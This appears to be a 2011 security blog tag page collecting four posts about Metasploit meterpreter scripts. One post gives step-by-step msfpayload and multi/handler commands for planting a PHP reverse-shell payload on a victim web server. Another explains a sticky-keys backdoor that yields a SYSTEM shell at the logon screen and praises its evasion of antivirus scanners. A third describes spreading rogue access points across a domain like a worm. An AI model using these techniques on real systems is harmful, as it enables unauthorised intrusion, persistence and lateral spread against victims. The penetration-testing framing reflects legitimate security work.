Tag: meterpreter


Meterpreter script – rogueap.rb – Abusing Windows Virtual Wireless NIC Feature

by on Oct.08, 2011, under Meterpreter Scripts, Posts

I found myself inspired by Vivek Ramachandran‘s videos, I thought I would take the honor in creating the simple meterpreter script that basically does what you see in the third installation of the Swse Addendum videos.

When I watched the third video I thought to myself, “This shouldn’t be too difficult to do”. From my perception, I think that Vivek was kind of hinting that he might have wanted to see someone in the info-sec community create a meterpreter script that does what you see in this video. I was glad to do this. 🙂

For penetration testers, this script means that they can now more easily setup rogue wireless access points by utilizing this script, that utilizes the soft ap feature that is implemented into Windows 7 and Windows 2008.

If the victim computers are part of a Windows domain and have wireless NICs, by automating Metasploit with a pass-the-hash attack and using my script, one could essentially automate deploying a series of rogue ap points throughout a domain. This would be kind of like a network worm.

If you’re curious about automating Metasploit, please see:

http://dev.metasploit.com/redmine/projects/framework/repository/revisions/8878/entry/documentation/msfconsole_rc_ruby_example.rc

My script gives the end user the option if they want to install the meterpreter service on the victim computer. I thought that giving this option would be ideal for if the victim computer ends up rebooting. If you were just to deploy the soft AP and run a binding payload, the binding payload most likely wouldn’t survive a reboot.

The script is available here:

http://zitstif.no-ip.org/meterpreter/rogueap.rb

http://zitstif.no-ip.org/meterpreter/rogueap.txt

If you have any issues and you need help, feel free to contact me. Additionally, don’t hesitate to modify the script if you need/want to do so.

2 Comments :, , , , , , , , , , , , , , , , , , , , , , more...

Meterpreter script – stickykeys.rb

by on Jul.18, 2011, under Code, Meterpreter Scripts, Posts

http://zitstif.no-ip.org/meterpreter/stickykeys.txt

Through the past year or so, I’ve had some ideas for meterpreter scripts floating around in my head that I’ve been meaning to put to use. So this is my first unofficial meterpreter script for the Metasploit Framework.

The purpose of this script is to place a backdoor onto a Windows victim system. What it simply does is, copy cmd.exe over to sethc.exe. The sethc.exe program is the sticky keys program. To activate this program you just have to hit the shift key 5 times and sethc.exe will be executed.

While this can be useful for those who are disabled, there is also an abuse for this feature. If you have copied cmd.exe over to sethc.exe, you can then hit shift 5 times and be provided a shell.

If you’re at a log on prompt and if you have this backdoor placed, when you activate sethc.exe (instead of logging in) you get a shell with SYSTEM level privileges!

This may seem trivial, however if you’re doing a penetration test on a remote Windows system that is running remote desktop, this can be a deadly means for maintaining access. You can then use this as pivoting your way back into the system, even if the original means (say for instance http) is blocked by an IPS and/or firewall.

One truly beautiful facet about this method if you’re an attacker, is that cmd.exe renamed as sethc.exe did not trigger any responses from scanners on www.virustotal.com.

I’m planning on adding more to this script, but I just wanted to get this released for the time being. I also want to state that I just put this idea to use for the Metasploit project, this hack has been around for a while:

http://goo.gl/E40Oj

To install this, simply download the txt file, then change the extension to .rb and throw this file in the framework3/msf3/scripts/meterpreter/ directory.

#Update 7/20/2011

Issue Addressed: Switched all C:\\WINDOWS to %SYSTEMROOT% (Thanks Rod Macpherson )
BUG: On Nokia N900 with Ruby 1.8.7 (arm-linux-eabi), with Metasploit Framework version: svn r13268, I am receiving a compile error message at line 70. (Unexpected ‘)’ )
NOTE: I am not having this issue on Backtrack 5 32bit with Ruby 1.9.2dev (i686-linux)

Leave a Comment :, , , , , , , , , , , , , , more...

Updated Section and Other Matters

by on Jan.19, 2011, under Posts

I haven’t had much time or energy to work on my website due to work, having a more than usual social life (odd), and school. I’m gong to make an honest effort to keep this website up to date at a higher frequency than what I’ve been doing.

This post is mostly in regards to my reconnaissance websites section. I’ve updated it and organized the websites by category. I’ve also added a link Samy’s geolocation page, which is great for finding actual (or close) locations of AP points, thanks to Google doing ‘legal’ wardriving.

Also, I’m planning on obtaining a Nokia n900, which I plan to ‘weaponize’ it in an original manner, and I will post steps to doing so on my website. I also have some meterpreter script ideas that I’m planning on working on. Additionally to that, I have a meterpreter script that has been laying around that utilizes an old trick for maintaining access to a compromised server, that I will plan on posting for metasploit users to use.

Here’s to a new year in information security! What will 2011 bring? 🙂

More to come as usual..

1 Comment :, , , , , , , , , , , , , , , , , , , , , , , more...

PHP meterpreter payload

by on Jul.03, 2010, under Posts

Today I’ll be showing a new feature that has just been added to the Metasploit framework.

http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html

When one can upload files to a www directory and want further leverage on the system, they may want to do this via PHP in some way. PHP shells are a viable solution for this problem, if certain parameters are met.

One parameter that must be met, is that the server must allow system commands through PHP. If the server permits system commands through PHP, then a PHP shell will be a great tool for further assessment and possible privilege escalation.

If you surf around on the internet looking for PHP shells, you’ll find ones such as: c99.php, DXshell.php. Honestly, check out: php-shell.org

Now as part of the Metasploit framework, pentesters can now use meterpreter as a php payload. I will run through a quick example of how to create a meterpreter php payload and how to execute it:

msfpayload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > mypayload.php

With this file you can use it on the web server to get a reverse connection. Hopefully, you have gained some sort of write access to the www directory on the victim’s website. (For example, if you were to sniff / capture ftp credentials to the victim’s website). Other scenarios for gaining access to the system, may include local or remote file inclusion.

On the attacker’s end all you have to do is setup msfconsole and use the multi/handler. The following commands should be issued:

msf >use multi/handler
msf >set PAYLOAD php/meterpreter/reverse_tcp
msf >set LHOST 127.0.0.1
msf >set LPORT 4444
msf >exploit -z -j

All the attacker needs to do now, is simply visit to page http://victim.com/mypayload.php and ideally the attacker should be able to get a meterpreter session.

More to come as usual…

8 Comments :, , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!